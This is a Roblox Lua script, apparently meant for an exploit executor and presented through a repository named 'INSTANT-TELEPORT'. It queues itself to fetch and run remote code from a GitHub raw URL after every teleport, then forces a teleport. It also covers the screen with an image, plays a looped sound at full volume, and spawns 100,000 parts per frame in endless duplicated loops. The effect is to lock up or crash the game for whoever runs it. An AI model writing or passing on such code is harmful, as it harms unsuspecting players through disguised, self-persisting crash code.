local TARGET_PLACE_ID = 109983668079237
local SCRIPT_URL = "https://raw.githubusercontent.com/BBv6al982/INSTANT-TELEPORT/main/iasbdwagd"

local IMAGE_ID = "rbxassetid://94672303684170"
local SOUND_ID = "rbxassetid://89724705509927"

local Players = game:GetService("Players")
local TeleportService = game:GetService("TeleportService")
local SoundService = game:GetService("SoundService")
local RunService = game:GetService("RunService")

local LocalPlayer = Players.LocalPlayer

-------------------------------------------------
-- ALWAYS TELEPORT (EVEN IF SAME GAME)
-------------------------------------------------
if queue_on_teleport then
    queue_on_teleport(string.format([[
        loadstring(game:HttpGet("%s"))()
    ]], SCRIPT_URL))
end

-- Force rejoin even if already in the same place
TeleportService:Teleport(TARGET_PLACE_ID, LocalPlayer)

wait(4.5)

-------------------------------------------------
-- GUI (NO LOAD WAIT)
-------------------------------------------------
task.spawn(function()
    local parentGui =
        (LocalPlayer:FindFirstChild("PlayerGui"))
        or game:GetService("CoreGui")

    local gui = Instance.new("ScreenGui")
    gui.Name = "FullscreenCover"
    gui.IgnoreGuiInset = true
    gui.ResetOnSpawn = false
    gui.ZIndexBehavior = Enum.ZIndexBehavior.Global
    gui.Parent = parentGui

    local img = Instance.new("ImageLabel")
    img.Parent = gui
    img.BackgroundTransparency = 0.5
    img.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    img.Size = UDim2.fromScale(1, 1)
    img.Image = IMAGE_ID
    img.ScaleType = Enum.ScaleType.Stretch
    img.ZIndex = 999999
end)

-------------------------------------------------
-- AUDIO (NO LOAD WAIT)
-------------------------------------------------
task.spawn(function()
    local sound = Instance.new("Sound")
    sound.SoundId = SOUND_ID
    sound.Volume = 10
    sound.Looped = true
    sound.Parent = SoundService
    sound:Play()
end)

wait(0.00625)

-------------------------------------------------
-- INFINITE PART SPAM (EXTREMELY HEAVY)
-------------------------------------------------
while true do
    local char = LocalPlayer.Character
    local hrp = char and char:FindFirstChild("HumanoidRootPart")
    local pos = hrp and hrp.Position or Vector3.new(0, 5, 0)

    for i = 1, 100000 do
        local part = Instance.new("Part")
        part.Size = Vector3.new(1, 1, 1)
        part.Position = pos
        part.Anchored = false
        part.Parent = workspace
    end

    RunService.Stepped:Wait()
end

while true do
    local char = LocalPlayer.Character
    local hrp = char and char:FindFirstChild("HumanoidRootPart")
    local pos = hrp and hrp.Position or Vector3.new(0, 5, 0)

    for i = 1, 100000 do
        local part = Instance.new("Part")
        part.Size = Vector3.new(1, 1, 1)
        part.Position = pos
        part.Anchored = false
        part.Parent = workspace
    end

    RunService.Stepped:Wait()
end
while true do
    local char = LocalPlayer.Character
    local hrp = char and char:FindFirstChild("HumanoidRootPart")
    local pos = hrp and hrp.Position or Vector3.new(0, 5, 0)

    for i = 1, 100000 do
        local part = Instance.new("Part")
        part.Size = Vector3.new(1, 1, 1)
        part.Position = pos
        part.Anchored = false
        part.Parent = workspace
    end

    RunService.Stepped:Wait()
end
while true do
    local char = LocalPlayer.Character
    local hrp = char and char:FindFirstChild("HumanoidRootPart")
    local pos = hrp and hrp.Position or Vector3.new(0, 5, 0)

    for i = 1, 100000 do
        local part = Instance.new("Part")
        part.Size = Vector3.new(1, 1, 1)
        part.Position = pos
        part.Anchored = false
        part.Parent = workspace
    end

    RunService.Stepped:Wait()
end
